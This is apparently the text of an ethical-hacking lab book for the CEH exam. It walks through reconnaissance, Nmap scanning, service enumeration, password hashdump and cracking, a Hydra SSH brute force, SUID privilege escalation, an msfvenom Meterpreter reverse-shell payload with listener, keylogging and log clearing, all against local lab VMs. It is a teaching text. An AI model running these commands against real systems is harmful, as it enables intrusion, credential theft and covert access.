Copyright Notice
Copyright © 2022 Paul Browning, all rights
reserved. No portion of this book may be
reproduced mechanically, electronically, or
by any other means, including photocopying
without written permission of the publisher.
https://www.101labs.net
ISBN: 9798825582177
Published by:
Reality Press Ltd.
Legal Notice
The advice in this book is designed to help
you achieve the standard of a Certified
Ethical Hacker and Certified Ethical Hacker -
Master engineer. Before you carry out more
complex operations, it is advisable to seek the
advice of experts.
Paul Browning
https://www.eccouncil.org/
https://www.101labs.com/resources
101ceh
Instructions
1. Please follow the labs from start to
finish. If you get stuck, do the next lab
and come back to the problematic lab
later. There is a good chance you will be
able to work out the solution as you gain
confidence and experience in configuring
the software and using the commands.
2. You can take the labs in any order, but
we’ve done our best to present them in
increasing difficulty to build up your
skill level as you go along incrementally.
For best results, do ALL the labs several
times over before attempting the exam.
3. There are resources as well as
configuration files for all the labs at
www.101labs.net/resources.
4. Please DO NOT configure these labs on
a live network or equipment belonging to
private companies or individuals.
5. Please DO NOT attempt to configure
these labs on other Linux distros. We’ve
chosen Kali for the labs due to it being
the most popular Linux distribution
among security experts.
6. You MUST be reading or have read a
CEH study guide or watched a theory
video course. Apart from some
configuration tips and suggestions, we
don’t explain much theory in this book;
it’s all hands-on labs.
7. It’s impossible for us to give individual
support to the thousands of readers of
this book (sorry!), so please don’t contact
us for tech support. Each lab has already
been tested by several tech editors, of
abilities ranging from beginner to expert.
Lab Objective:
Learn how to create your own lab
environment as well as some hacking
terminology.
Lab Purpose:
In this lab, we’ll go through the process of
making your own lab environment where you
can safely practice ethical hacking. In
addition to that, we’ll be introducing some
concepts and terminology that exist within
the cyber security world.
Lab Tool:
VMware or other Virtual Machine
hypervisors.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
The first step here would be to download a
Kali Linux Virtual Machine (VM) image file,
suitable to your CPU architecture (x86, x64,
ARM etc.), from this URL:
https://www.kali.org/get-kali/#kali-virtual-machines.
It is recommended to run Kali, and all other
Operating Systems (OS), in a VM for security
reasons, since we’ll be working with dangerous
files (such as viruses) later on. In addition to
that, we’re creating our own lab environment
because we aim to be ethical hackers, otherwise
known as white-hat hackers. There are also
black-hat and gray-hat hackers, who are engaged
in illegal or borderline legal hacking,
respectively. In the broadest sense, a hacker is
simply an individual who uses things in a way
they are not intended to be used.
Feel free to use whichever VM software you
like; mine is VMware Workstation Pro. Once
you download and install the VM software of
your choice, install the VM image, then pick
the option to open a pre-existing VM file, like
in the screenshot below.
https://www.vulnhub.com/entry/owasp-broken-web-applications-project-12,46/.
https://www.vulnhub.com/entry/metasploitable-2,29/.
Lab Objective:
Learn how to find information on a particular
target using search engines like Google.
Lab Purpose:
In this lab, we’ll look into leveraging search
engines to discover particular information
about our targets. Because our lab VMs are
all locally hosted, we’ll have to look at some
publicly available domains.
Lab Tool:
Google.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Everyone is using search engines on a daily
basis, but not everyone knows that search
engines have special queries that allow us to
look up very specific information about a
target. In this lab, you’ll be introduced to a
couple of those queries, ones that I’ve found
most useful in my ethical hacking endeavors.
Lab Objective:
Learn how to gain information on Top-Level
Domains (TLDs) and subdomains.
Lab Purpose:
In this lab, we’ll look into another passive
reconnaissance technique, and that is looking
up TLD and subdomains of a particular
target. This information is crucial because,
depending on the scope of a particular
penetration test, we can leverage
vulnerabilities in other parts of the client’s
infrastructure in order to gain a foothold on
our main target.
Lab Tool:
Netcraft.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
TLDs are essentially the topmost domains in
the hierarchical Domain Name System (DNS)
of the internet, with only the root domain
above them. Subdomains, on the other hand,
are additional, specific “branches” to your
main domain name. For example, a URL of
www.google.com contains the following
information: the subdomain is www and its
TLD is com. The more you know about a
target, the greater the likelihood of successful
exploitation as your attack surface increases.
For the purpose of this lab, we will be using
the following web applications:
https://sitereport.netcraft.com.
https://pentest-tools.com/.
The former allows us to gain insight into a
target’s setup, such as IP address, owner,
geolocation and more. The latter can be used
to enumerate subdomains, for example, but a
lot more besides that. As always, you are
encouraged to explore on your own. For now,
type in google.com in both web apps:
https://sitereport.netcraft.com/?url=google.com.
https://pentest-tools.com/information-gathering/website-reconnaissance-discover-web-application-technologies.
Lab Objective:
Learn how to perform OSINT using social
networking websites.
Lab Purpose:
In this lab, we’ll look into another technique
for gathering information about our targets in
the form of passive reconnaissance. This time
we’ll look at social media presence and the
wealth of information it can contain.
Lab Tool:
Osintgram.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Social media, or social networks, oftentimes
contain more information than necessary.
People leave all sorts of data on places like
Twitter, Facebook, Instagram, etc. This can
be leveraged for things like social-
engineering campaigns (think phishing
emails), brute forcing user accounts (through
username harvesting), and sometimes,
thankfully not too often, people will, by
accident, post passwords on social networks.
Lab Objective:
Learn how to perform passive recon using
Shodan.
Lab Purpose:
Shodan is an incredibly powerful search
engine, essentially allowing you to look up
any and all devices connected to the internet,
such as computers, cameras, and more. In this
lab, we’ll see how we can leverage that
information for our ethical hacking
endeavors.
Lab Tool:
Shodan.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Shodan essentially contains information on
Internet of Things (IoT) devices. We can
query for devices in different ways, and some
of the more common queries are listed on the
homepage.
Lab Objective:
Learn how to utilize web spiders to discover
interesting web application elements.
Lab Purpose:
In this lab, we’ll go through web spiders,
tools that interact with a web application,
probing it for elements that may not be
immediately obvious to the human eye.
Lab Tool:
BurpSuite.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Since this is the first time we’ll actually be
using a native tool on our Kali machine, it’s a
good idea to make sure everything is up to
date with the following set of commands:
apt update
apt upgrade
apt install burpsuite zaproxy
in CLI/terminal.
Lab Objective:
Learn how to perform website mirroring.
Lab Purpose:
Website mirroring is a useful skill to have as
a penetration tester, especially if social
engineering is within scope of your
penetration testing engagement.
Lab Tool:
HTTrack.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Website mirroring is basically copying an
entire web application, or some parts of it,
depending on what our end goal is. This is
useful if we want to trick someone into
believing we are hosting a legitimate site for
the purpose of, for example, credential
harvesting. Let’s begin with the command:
apt install httrack
httrack --help
Lab Objective:
Learn how to use the Wayback Machine to
gather OSINT on targets.
Lab Purpose:
In this lab, we’ll look into gathering
seemingly outdated and forgotten yet crucial
data on our clients and, more specifically,
client web applications.
Lab Tool:
Wayback Machine.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
The Wayback Machine is an archive of web
application snapshots. It essentially contains
copies of web applications at various points
in time, capturing some (but not all) of the
contents of the application in question. This
can allow us, as ethical hackers, to glean
information such as previously available
endpoints, configuration and backup files and
more.
Lab Objective:
Learn how to analyze metadata from publicly
available documents.
Lab Purpose:
Metadata is information embedded within
files of various types. This data can contain
things such as OS version, GPS coordinates
and more. In this lab, we’ll look at how we
can harvest and analyze that data.
Lab Tool:
FOCA.
Lab Topology:
You can use Windows in a VM for this lab.
Lab Walk-Through:
The tool presented in this lab works on
Windows only, so we’ll be using that as our
VM. Once the VM boots up, go to the
following URLs:
https://www.microsoft.com/en-us/sql-server/sql-server-downloads.
https://github.com/ElevenPaths/FOCA/releases
Lab Objective:
Learn how to access Whois database
information.
Lab Purpose:
Whois is essentially a database of information
pertaining to a particular domain name. This
information includes things such as domain
registrar name, IP addresses and blocks, and
more.
Lab Tool:
Whois.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Whois can be invoked in an incredibly simple
way, just type:
whois google.com
Lab Objective:
Learn how to perform DNS footprinting
using various tools.
Lab Purpose:
We’ve already touched upon the topic of
TLD and subdomain enumeration in one of
our previous labs. In this one, we’ll look at
Kali Linux native tools designed specifically
to address this portion of information
gathering.
Lab Tool:
DNSenum.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
For this lab, we’ll have to install a wordlist
compilation called SecLists:
apt update
apt install seclists
Lab Objective:
Learn how to perform network footprinting
via subnetting and traceroute.
Lab Purpose:
Subnetting is the art of splitting a particular
IP network into smaller segments, while
tracerouting enables us to see the path a
packet takes from our device (Kali Linux) all
the way to the target. This has the potential to
help us identify any obstacles along the way.
Lab Tool:
Traceroute.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
This particular lab will contain a bit more
theory than most others, but it is crucial that
you understand subnetting well as it is
expected of you to be familiar with it by
virtually all cyber security certifications out
there, CEH included.
Lab Objective:
Learn how to use Maltego and perform
OSINT investigations.
Lab Purpose:
In this and the next couple of labs, we’ll look
into OSINT tools, the first one on the list
being Maltego, an industry standard when it
comes to Open-Source Intelligence gathering.
Lab Tool:
Maltego.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Just in case it’s not installed in your version
of Kali, depending on when you go through
these labs, we’ll run the following commands
to ensure Maltego is present on our system:
apt update
apt install maltego
Lab Objective:
Learn how to use Recon-ng for OSINT
gathering.
Lab Purpose:
Recon-ng is another tool in our toolbelt that
can help us gather information on our targets.
OSINT is good because it gathers publicly
available data, meaning we do not interact
with our target directly.
Lab Tool:
Recon-ng.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
In order to use Recon-ng to its full potential,
you must have access to API keys. Before
anything, some preparatory steps:
apt update
apt install recon-ng
recon-ng
workspaces create ceh
marketplace refresh
marketplace install all
keys list
for example.
These can, as before, when we get access to
information such as emails, be used for social
engineering, brute force attacks, etc.
Lab Objective:
Learn how to use Recon-dog for OSINT.
Lab Purpose:
Another tool in our OSINT gathering arsenal
is Recon-dog. Let’s look at how to use it in
this lab.
Lab Tool:
Recon-dog.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
In order to use Recon-dog, we first have to
download it from GitHub, so let’s do just
that:
git clone https://github.com/s0md3v/ReconDog.git
cd ReconDog
chmod +x dog
./dog
Lab Objective:
Learn how to perform OSINT lookups using
OSRFramework.
Lab Purpose:
OSRFramework (OSRF) is the last OSINT
tool we’ll be looking into in these labs. Most
other OSINT tools aren’t concerned with
things like usernames or phone numbers;
instead, they look only for domains and their
associated information. OSRF fills in those
gaps and does so rather well.
Lab Tool:
OSRFramework.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
As always, let’s make sure the tool is
installed on our Kali VM with the commands:
apt update
apt install osrframework
osrf --help
Lab Objective:
Consolidate knowledge on passive
reconnaissance and OSINT.
Lab Purpose:
In this lab, we’ll look at most, if not all,
passive recon and OSINT tools we’ve worked
with in the labs up to this one. We’ll try to
make things concise and meaningful.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
To start things off, let’s use Google to look
up some information on eccouncil.org with
the query:
site:eccouncil.org filetype:pdf
Lab Objective:
Learn how to perform basic scans using
Nmap.
Lab Purpose:
Nmap is, as its name implies, a network
mapper, an industry standard, and probably
one of the most used tools in all of
penetration testing. In this lab, we’ll look into
its most basic functionality.
Lab Tool:
Nmap.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
So, once you boot up Kali and
Metasploitable, log into both and then
proceed to identify the correct IP addresses. If
you set up your lab correctly, they should be
on the same network; in my case, that’s
192.168.77.0/24 (refer to the lab on
subnetting to understand what this means).
Specifically, my Kali is on the IP address of
192.168.77.128 and Metasploitable is
192.168.77.154. With that out of the way, we
can get down to using Nmap. Again, let’s
check out its help menu:
nmap --help
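The subnetting theory the earlier subnetting lab promises, and the “same network” check this walk-through relies on for 192.168.77.0/24, worked through in Python as an added example (not code from the book): the script derives mask, network and broadcast addresses and the usable host range from a CIDR, tests whether two hosts share a subnet, and splits the /24 into /26 segments. The addresses are the lab’s own; the function names are mine.

```python
"""Subnetting math by hand (added example, not part of the original labs).

Works through the 192.168.77.0/24 lab network from the Nmap walk-through:
mask, network/broadcast, usable host range, a "same subnet?" check, and
splitting the /24 into smaller /26 segments.
"""
from dataclasses import dataclass


def ip_to_int(ip: str) -> int:
    """Convert dotted-quad text to a 32-bit integer, validating each octet."""
    octets = ip.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 address: {ip!r}")
    value = 0
    for octet in octets:
        n = int(octet)
        if not 0 <= n <= 255:
            raise ValueError(f"octet out of range in {ip!r}")
        value = (value << 8) | n
    return value


def int_to_ip(value: int) -> str:
    """Inverse of ip_to_int: 32-bit integer back to dotted quad."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def prefix_to_mask(prefix: int) -> int:
    """/24 -> 0xFFFFFF00: the top `prefix` bits set, the host bits cleared."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be 0..32")
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


@dataclass(frozen=True)
class Subnet:
    network: str
    prefix: int
    mask: str
    broadcast: str
    first_host: str
    last_host: str
    usable_hosts: int


def describe(cidr: str) -> Subnet:
    """Compute the key facts about a network given in CIDR notation."""
    ip_text, prefix_text = cidr.split("/")
    prefix = int(prefix_text)
    mask = prefix_to_mask(prefix)
    network = ip_to_int(ip_text) & mask          # clear the host bits
    broadcast = network | (~mask & 0xFFFFFFFF)   # set the host bits
    size = 1 << (32 - prefix)
    if prefix >= 31:                             # /31 and /32: no broadcast
        first, last, usable = network, broadcast, size
    else:
        first, last, usable = network + 1, broadcast - 1, size - 2
    return Subnet(int_to_ip(network), prefix, int_to_ip(mask),
                  int_to_ip(broadcast), int_to_ip(first), int_to_ip(last),
                  usable)


def same_subnet(ip_a: str, ip_b: str, prefix: int) -> bool:
    """Two hosts share a subnet when their network bits are identical."""
    mask = prefix_to_mask(prefix)
    return (ip_to_int(ip_a) & mask) == (ip_to_int(ip_b) & mask)


def split(cidr: str, new_prefix: int) -> list:
    """Split a network into equal smaller segments with a longer prefix."""
    parent = describe(cidr)
    if new_prefix < parent.prefix:
        raise ValueError("new prefix must be longer than the parent's")
    step = 1 << (32 - new_prefix)
    base = ip_to_int(parent.network)
    count = 1 << (new_prefix - parent.prefix)
    return [f"{int_to_ip(base + i * step)}/{new_prefix}" for i in range(count)]


if __name__ == "__main__":
    print(describe("192.168.77.0/24"))
    # Kali (.128) and Metasploitable (.154) from this lab share the /24.
    print(same_subnet("192.168.77.128", "192.168.77.154", 24))
    print(split("192.168.77.0/24", 26))
```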
Lab Objective:
Learn how to perform advanced scans using
Nmap.
Lab Purpose:
In this lab, we’ll expand upon our usage of
Nmap to see more of its functionality.
Lab Tool:
Nmap.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
The more advanced the scans we intend to
run become, the more time-consuming and
stressful to the target they are going to be.
Not only that, but they are also likely to leave
a massive number of logs on the target, so
they are not exactly stealthy. That is why, as
we increase the “depth” of our scans, we
must reduce the width, and the simplest way
in which we can do so is by running these
advanced scans against only a select number
of ports. Now, in our previous lab, we ran
Nmap without any port specifications. That
means Nmap used its default approach of
scanning the 1000 most popular TCP and
UDP ports (remember that there are 65535
ports on both TCP and UDP). Now, this
leaves out 64535 ports untested, and they too
can potentially host various services. Because
we saw UDP took a significantly longer time
than TCP, scanning all 65535 UDP ports is
likely not going to be a good time investment,
but scanning 65535 TCP ports seems
feasible, especially in a local lab like ours, so
let’s do just that:
nmap -p- 192.168.77.154
Lab Objective:
Learn how to perform firewall and IDS
evasion while scanning with Nmap.
Lab Purpose:
In this lab, we’ll introduce you to the basics
of firewall and IDS evasion using Nmap. We
won’t be going too deep when it comes to
this because the deterrent landscape changes
all the time, and it is up to the penetration
tester to determine the best approach
considering the defensive measures in place
for each particular engagement.
Lab Tool:
Nmap.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
We’ll be using Windows 7 as our target of
choice because it has at least some, albeit
rudimentary, firewall built into itself, unlike
Metasploitable and OWASP VMs, which
have none whatsoever. So, we’ll have to
check the IP address, which in Windows is
done with the command:
ipconfig /all
Lab Objective:
Learn how to perform banner grabbing using
Ncat.
Lab Purpose:
Ncat is an upgraded version of Netcat, the so-
called TCP/IP Swiss Army knife. It comes
bundled with Nmap and is actively developed
alongside it. We’ll look at its most basic
functionality within this lab.
Lab Tool:
Ncat.
Lab Topology:
You can use Kali Linux, Metasploitable and
OWASP Broken Web Applications Project
(BWA) in a VM for this lab.
Lab Walk-Through:
Ncat is an incredibly versatile tool, hence its
above-mentioned nickname. While it might
not be pre-installed on most Linux
distributions, its syntax is the same as that of
Netcat, its older cousin. We’ll be working
with Ncat because it’s just better, but for all
intents and purposes, you can extrapolate
functionality and syntax into Netcat, should
you encounter it on your ethical hacking
adventures.
Lab Objective:
Consolidate knowledge on the network
scanning portion of active reconnaissance.
Lab Purpose:
Here’s another lab where we’ll look back at
the tools we’ve examined in order to see how
they can give us information to direct the next
steps of our penetration testing engagement.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Not a lot of tools here, but a lot of
functionality, so let’s get to it.
Lab Objective:
Learn how to perform NetBIOS enumeration
on Windows 7.
Lab Purpose:
NetBIOS stands for Network Basic
Input/Output System. It allows applications
on separate computers within the same Local
Area Network (LAN) to communicate. It is
not a networking protocol but an API
(Application Programming Interface). In this
lab, we’ll look at local enumeration of
NetBIOS.
Lab Tool:
Nbtstat.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Local enumeration differs from remote
(which is what we’ve been doing thus far) in
that it requires access to the target. In other
words, we will do this lab with the
presupposition that we’ve already achieved
initial foothold onto our Windows 7 target
VM, and are looking for more information to
potentially escalate our privileges.
Lab Objective:
Learn how to perform SNMP enumeration.
Lab Purpose:
SNMP (Simple Network Management
Protocol) is, if available, probably the best
source of information on a target that you can
wish for as an ethical hacker. It most
commonly runs on UDP port 161 and, as the
name (sort of) implies, its purpose is the
management and monitoring of networked
devices.
Lab Tool:
SNMP-check.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
Before we proceed with running our
enumerating tool of choice, we have to enable
SNMP on our Windows VM. To do that, go
to Control Panel → Programs and Features
→ Turn Windows features on or off →
enable Simple Network Management
Protocol and its “child” WMI SNMP
Provider.
After that, go back to Control Panel and
select Administrative Tools → Services →
SNMP Service → Properties → Security →
Add an Accepted community name of
“public” and Accept SNMP packets from any
host. Click Apply → OK, then restart the
service from the same menu.
Now, we’re good to go and can check out this
amazing repository of information with the
command:
snmp-check 192.168.77.156
And voila, it’s as simple as that. Just look at
all the data we’ve been able to uncover; it
cannot even fit within a single screen!
Lab Objective:
Learn how to perform SMTP enumeration.
Lab Purpose:
We’ve already looked at the primary purpose
behind SMTP enumeration, and that is the
discovery of usernames on a target. That is
why we’ll use this lab as an opportunity to
introduce an incredibly powerful tool.
Lab Tool:
Metasploit Framework.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Metasploit Framework (MSF) is one of the
most versatile and ubiquitous tools in the
industry. It can integrate with Nmap, perform
information gathering, exploitation, privilege
escalation, and more. Of course, it can do
none of that without proper guidance by a
skilled, ethical hacker, so it’s important to
familiarize ourselves with the tool. In this lab,
we’ll use it to perform an automated
username enumeration via SMTP, so let’s
start the tool with the command:
msfdb run
workspace -a ceh
Lab Objective:
Learn how to perform Server Message Block
(SMB) enumeration.
Lab Purpose:
SMB is a communication protocol that
Microsoft created for providing shared access
to files and printers across nodes on a
network. For an ethical hacker, it’s on par
with SNMP when it comes to the information
that can be accessed should this service be
available and insecurely implemented on a
target.
Lab Tool:
Enum4linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
SMB is already up and running on our
Metasploitable target, so all we have to do is
point Enum4linux towards it. Now, in order
to know how to do that, we, of course, have
to first access its help menu:
enum4linux --help
Lab Objective:
Wrap up all that we have learned about
services enumeration.
Lab Purpose:
In this lab, we’ll look back at all of the
enumeration we’ve done so far and see how
we can infer “low-hanging fruit” and
potential avenues of attack. To top it off,
we’ll perform simple exploitation of our
Metasploitable VM.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Let’s start things off with SNMP enumeration
against our Metasploitable VM. To make
Metasploitable’s SNMP service accessible to
an external machine, we need to do the
following:
Lab Objective:
Learn how to perform vulnerability
assessments using Nessus.
Lab Purpose:
Nessus is one of the most well-known
vulnerability scanners in the industry. In this
lab, we’ll look into its features, pros and
cons.
Lab Tool:
Nessus.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Due to the length of this lab, we’ll skip over
the installation of Nessus. As stated multiple
times already, this level of knowledge is
expected if you are looking at CEH.
Lab Objective:
Learn how to perform vulnerability
assessments using OpenVAS.
Lab Purpose:
In this lab, we’ll look at Nessus’ open-source
counterpart OpenVAS, another vulnerability
assessment scanner that’s commonly used in
cyber security.
Lab Tool:
OpenVAS.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Unlike Nessus, which has to be downloaded
from a third-party website and then manually
installed, OpenVAS can be installed directly
from within Kali with the commands:
apt update
apt install openvas* gvm*
gvm-setup
gvm-check-setup
gvm-start
Lab Objective:
Learn how to steal passwords from
vulnerable targets.
Lab Purpose:
We’ll look into another potential avenue of
attack, and that is harvesting passwords
and/or password hashes from targets that
have vulnerable or misconfigured services.
Lab Tool:
Metasploit Framework.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Let’s fire up our trusty friend MSF, search for
PostgreSQL password hashdump module and
point it towards our Metasploitable VM:
msfdb run
search type:auxiliary name:postgre
use auxiliary/scanner/postgres/postgres_hashdump
options
set RHOSTS 192.168.77.154
run
Lab Objective:
Learn how to perform local password
cracking using John the Ripper.
Lab Purpose:
In this and the next lab, we’ll conclude our
exploitation efforts with the most time-
intensive (and often resource-intensive)
attacks, password cracking and brute forcing.
Lab Tool:
John the Ripper.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Up to this point, we’ve mostly been gathering
various types of information, and it’s finally
time to put it all to use. Let’s go ahead and
take the password hash obtained in the
previous lab
(md53175bce1d3201d16594cebf9d7eb3f9d)
and see how we can crack it.
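Why the previous lab’s hashdump output and the wordlist tweak in the next lab fit together, as an added Python example (not code from the book): PostgreSQL’s legacy md5 scheme stores "md5" + MD5(password || username), so the postgres role’s hash from the hashdump lab is checked by hashing each candidate word joined with the role name. LAB_HASH is the value quoted above; the sample wordlist is constructed.

```python
"""PostgreSQL "md5" password hashes (added example, not from the labs).

The hashdump lab returned md53175bce1d3201d16594cebf9d7eb3f9d for the
postgres role.  PostgreSQL's legacy scheme is "md5" + MD5(password ||
username): the only "salt" is the role name, which is why a plain MD5
cracker has to be fed password+username candidates.
"""
import hashlib

# Hash value taken from the hashdump lab on this page.
LAB_HASH = "md53175bce1d3201d16594cebf9d7eb3f9d"

# Constructed mini wordlist (stand-in for rockyou.txt).
SAMPLE_WORDS = ["123456", "password", "msfadmin", "postgres"]


def pg_md5(password: str, username: str) -> str:
    """Reproduce PostgreSQL's legacy md5 password storage format."""
    digest = hashlib.md5((password + username).encode("utf-8")).hexdigest()
    return "md5" + digest


def is_pg_md5(stored: str) -> bool:
    """Recognize the format: 'md5' prefix followed by 32 lowercase hex chars."""
    body = stored[3:]
    return (stored.startswith("md5") and len(body) == 32
            and all(c in "0123456789abcdef" for c in body))


def wordlist_check(stored: str, username: str, candidates):
    """Return the first candidate whose pg_md5 matches, or None.

    Mirrors what the cracking lab does by appending word+username to the
    wordlist: the role name is folded into the digest, so each dictionary
    word must be hashed together with it.
    """
    if not is_pg_md5(stored):
        raise ValueError("not a PostgreSQL md5 hash")
    for word in candidates:
        if pg_md5(word, username) == stored:
            return word
    return None


if __name__ == "__main__":
    print(wordlist_check(LAB_HASH, "postgres", SAMPLE_WORDS))
```

The defender’s takeaway is that this scheme is a single fast MD5 salted only by the role name; PostgreSQL 10 and later support `password_encryption = scram-sha-256`, which is randomly salted and iterated.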
Lab Objective:
Learn how to perform remote password brute
forcing using THC-Hydra.
Lab Purpose:
This is the final lab in our password cracking
segment and one in which we’ll finally gain
access to a target machine.
Lab Tool:
THC-Hydra.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
What we’ll do in this lab is probably the most
intensive attack on a target and should be
done as a last resort. We’re going to take the
username values from our SMTP
enumeration lab, a wordlist with over 10
million potential passwords and launch this
attack against Metasploitable’s SSH service
on port 22. So, let’s do just that with the
commands:
cp /usr/share/wordlists/rockyou.txt .
echo postgrespostgres >> rockyou.txt
echo -e "msfadmin\nbackup\nbin\ndaemon\ndistccd\nftp\ngames\ngnats\nirc\nlibu
data" > usernames
hydra -L usernames -P rockyou.txt 192.168.77.154 -t 4 ssh
ssh -oHostKeyAlgorithms=+ssh-dss msfadmin@192.168.77.154
And voila, we got shell access via SSH
(literally “Secure Shell”) and can now
proceed to the next stage of a penetration test,
privilege escalation.
Lab Objective:
Consolidating knowledge on password
attacks.
Lab Purpose:
Let’s look back at what we’ve learned
regarding password cracking and how we can
use it as a single “unit.”
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
So, the topics we’ve covered with password
related attacks are password harvesting,
remote brute forcing and local cracking. Note
that some of these labels can be used
interchangeably, such as local brute forcing
or remote cracking, etc.
Lab Objective:
Learn how to perform privilege escalation
from locally discovered vulnerabilities.
Lab Purpose:
Privilege escalation is the next step of a
penetration test. Once we’ve established
initial foothold in the exploitation phase, we
now have to look at ways to escalate our
privileges and become as powerful a user as
we possibly can on a given target.
Lab Tool:
LinEnum.
Lab Topology:
You can use Kali Linux and Metasploitable
in a VM for this lab.
Lab Walk-Through:
Seeing how we already have shell access to
our target, privilege escalation most
commonly revolves around using
misconfigured tools and services already
available on the target, as well as applications
with known vulnerabilities, exploits for
which can be run locally to facilitate privesc.
[Screenshots of the LinEnum findings omitted.]
Now, we can have our pick, and I’m going to
go with SUID on /usr/bin/nmap. To exploit
these kinds of things, an excellent repository
is https://gtfobins.github.io/. To exploit this
bit of misconfiguration, type the following:
/usr/bin/nmap --interactive
!sh
id
Lab Objective:
Learn how to run local apps on a Windows
target.
Lab Purpose:
We’ve already run some local apps on Linux
targets (remember using Nmap for privilege
escalation). In this lab, we’ll look at what’s
possible when it comes to running local apps
on a Windows target, the pros and cons as
well as comparing it to Linux.
Lab Tool:
Remote Desktop Protocol.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
To access our Windows 7 VM via SSH, we
need to do the following on our Kali box:
ssh IEUser@192.168.77.156
Lab Objective:
Learn how to perform keylogging.
Lab Purpose:
Keylogging is the act of capturing keyboard
inputs from a target machine. This is done in
order to potentially harvest credentials or see
the daily habits of a client.
Lab Tool:
Meterpreter.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
Now, while you can create a piece of
malware that is custom-made and unique,
whose sole purpose is to capture keystrokes,
that’s outside the scope of this lab. What
we’ll do instead is use keylogging capability
of an incredibly powerful payload called
Meterpreter. Meterpreter interacts with MSF
and gives us incredible utility. To create a
Meterpreter payload, we need to invoke the
following:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows LHOST=192.168.77.128 LPORT=1234 -o meterpreter.exe
Lab Objective:
Learn how to hide key data in inconspicuous
files.
Lab Purpose:
Steganography is the art (or technique) of
hiding critical information within seemingly
unimportant files. For those of you who’ve
watched the TV show Mr. Robot, it’s what
Elliot does to hide data within music CDs.
Lab Tool:
Steghide.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
Before anything, you’re going to be needing
an image file, a picture of some sort. Either
use your own or one that has no royalties
attached to it. After you get that, place it into
your present working directory, then type:
steghide --help
Lab Objective:
Learn how to clean your tracks after a
successful exploitation.
Lab Purpose:
Every good hacker knows that it is paramount
to leave no tracks on your target. We, as
ethical hackers, need to emulate, as closely as
possible, the behavior of black-hat hackers,
so we too must cover our tracks and work to
be as stealthy as we can.
Lab Tool:
Meterpreter
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
In order to clear some logs, we first have to
make some logs. So, let’s exploit our
Windows VM via the meterpreter.exe that
we’ve used in one of our previous labs. As
before, we have to set up MSF to “catch” our
reverse connection:
msfdb run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.77.128
set LPORT 1234
run
:wq
upload skyline.jpg
Lab Objective:
A wrap-up on all of our post-exploitation
labs.
Lab Purpose:
In this lab, we’ll look at everything we’ve
learned with regards to post-exploitation,
starting from password attacks, over local
vulnerability exploitation, executing local
apps, keyloggers, and hiding files to clearing
logs.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and Windows 7 in a
VM for this lab.
Lab Walk-Through:
So, let’s start everything in order. First, we
perform remote password brute force attacks
against Windows’ SSH service with the
command:
hydra -l IEUser -P passwords -t 4 192.168.77.156 ssh
Lab Objective:
Learn about different types of malware and
how we can create a basic one.
Lab Purpose:
We’ve already worked with MSFVenom, the tool
we’ll be using in this lab, but this time we’re
going to dive deeper into its functionality, as
well as into what exactly malware, a trojan, a
virus, etc., is.
Lab Tool:
MSFVenom.
Lab Topology:
You can use Kali Linux in a VM for this lab.
Lab Walk-Through:
So first, a bit of theory: what is malware,
what are trojans, viruses, worms, and
ransomware? Well, all malicious software is
malware (MALicious + softWARE), and
trojans, viruses, worms and ransomware all
fall under that umbrella term. Trojans, in turn,
are all malware disguised to look like
